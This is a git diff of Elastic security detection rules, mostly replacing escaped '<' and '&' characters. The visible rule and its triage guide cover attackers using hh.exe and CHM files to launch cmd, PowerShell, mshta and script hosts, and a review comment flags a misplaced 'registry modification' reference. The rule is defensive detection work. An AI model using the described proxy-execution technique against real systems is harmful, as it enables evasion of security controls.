@@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Process Activity via Compiled HTML File", - "note": "## Triage and analysis\n\n### Investigating Process Activity via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the parent process to gain understanding of what triggered this behavior.\n - Retrieve `.chm`, `.ps1`, and other files that were involved to further examination.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' 
OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full 
antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Process Activity via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the parent process to gain understanding of what triggered this behavior.\n - Retrieve `.chm`, `.ps1`, and other files that were involved to further examination.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' 
OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full 
antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"hh.exe\" and\n process.name : (\"mshta.exe\", \"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"cscript.exe\", \"wscript.exe\")\n",
 "related_integrations": [
 {
@@ -53,7 +53,7 @@
 ],
 "risk_score": 47,
 "rule_id": "e3343ab9-4245-4715-b344-e11c56b0a47f",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -88,7 +88,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
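Review bot: The investigation step "Investigate potentially compromised accounts ... searching for login events (for example, 4624) to the target host after the registry modification" in the new `note` line does not fit this rule, which (per the `query` context line) fires on a child process of `hh.exe`, not on any registry change — it reads as text carried over from a registry-focused guide and gives the analyst the wrong time anchor. I would reword it to `...searching for login events (for example, 4624) to the target host around the time the child process of \`hh.exe\` was started.`, and while there fix `to further examination` to `for further examination` in the "Retrieve `.chm`, `.ps1`..." step. This hunk only changes the `\u003e` escapes, so the wording predates the commit; the identical guide text appears in the `_105`, `_106` and `_108` copies of this rule, so whatever source these generated files come from is presumably where the correction belongs.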
diff --git a/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_108.json b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_108.json
index 643241c7faf..02686393cec 100644
--- a/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_108.json
@@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Process Activity via Compiled HTML File", - "note": "## Triage and analysis\n\n### Investigating Process Activity via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the parent process to gain understanding of what triggered this behavior.\n - Retrieve `.chm`, `.ps1`, and other files that were involved to further examination.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' 
OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full 
antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Process Activity via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the parent process to gain understanding of what triggered this behavior.\n - Retrieve `.chm`, `.ps1`, and other files that were involved to further examination.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' 
OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full 
antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"hh.exe\" and\n process.name : (\"mshta.exe\", \"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"cscript.exe\", \"wscript.exe\")\n",
 "related_integrations": [
 {
@@ -53,7 +53,7 @@
 ],
 "risk_score": 47,
 "rule_id": "e3343ab9-4245-4715-b344-e11c56b0a47f",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -88,7 +88,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_102.json b/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_102.json
index 2ae4979ea86..f342b31d5f7 100644
--- a/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_102.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_103.json b/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_103.json
index 8deec88761f..c1db9c6734b 100644
--- a/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_103.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_104.json b/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_104.json
index 18d611321fa..95d3aa05828 100644
--- a/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_104.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_205.json b/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_205.json
index 21afbf02937..49b2b144da3 100644
--- a/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/e3c27562-709a-42bd-82f2-3ed926cced19_205.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_102.json b/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_102.json
index 5fd5010fe0a..996245ca54c 100644
--- a/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_102.json
@@ -54,7 +54,7 @@
 ],
 "risk_score": 21,
 "rule_id": "e3cf38fa-d5b8-46cc-87f9-4a7513e4281d",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_103.json b/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_103.json
index d0e83d21ed7..957d2ae3773 100644
--- a/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_103.json
@@ -54,7 +54,7 @@
 ],
 "risk_score": 21,
 "rule_id": "e3cf38fa-d5b8-46cc-87f9-4a7513e4281d",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_104.json b/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_104.json
index 4d86fca3bd8..ae9e1096df5 100644
--- a/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_104.json
@@ -54,7 +54,7 @@
 ],
 "risk_score": 21,
 "rule_id": "e3cf38fa-d5b8-46cc-87f9-4a7513e4281d",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_105.json b/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_105.json
index 8930d97bd5f..7629f750984 100644
--- a/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/e3cf38fa-d5b8-46cc-87f9-4a7513e4281d_105.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 21,
 "rule_id": "e3cf38fa-d5b8-46cc-87f9-4a7513e4281d",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_103.json b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_103.json
index 3a5ebf76758..995f221e909 100644
--- a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_103.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 47,
 "rule_id": "e3e904b3-0a8e-4e68-86a8-977a163e21d3",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_104.json b/packages/security_detection_engine/kibana/security_rule/e3e904b3-0a8e-4e68-86a8-977a163e21d3_104.json
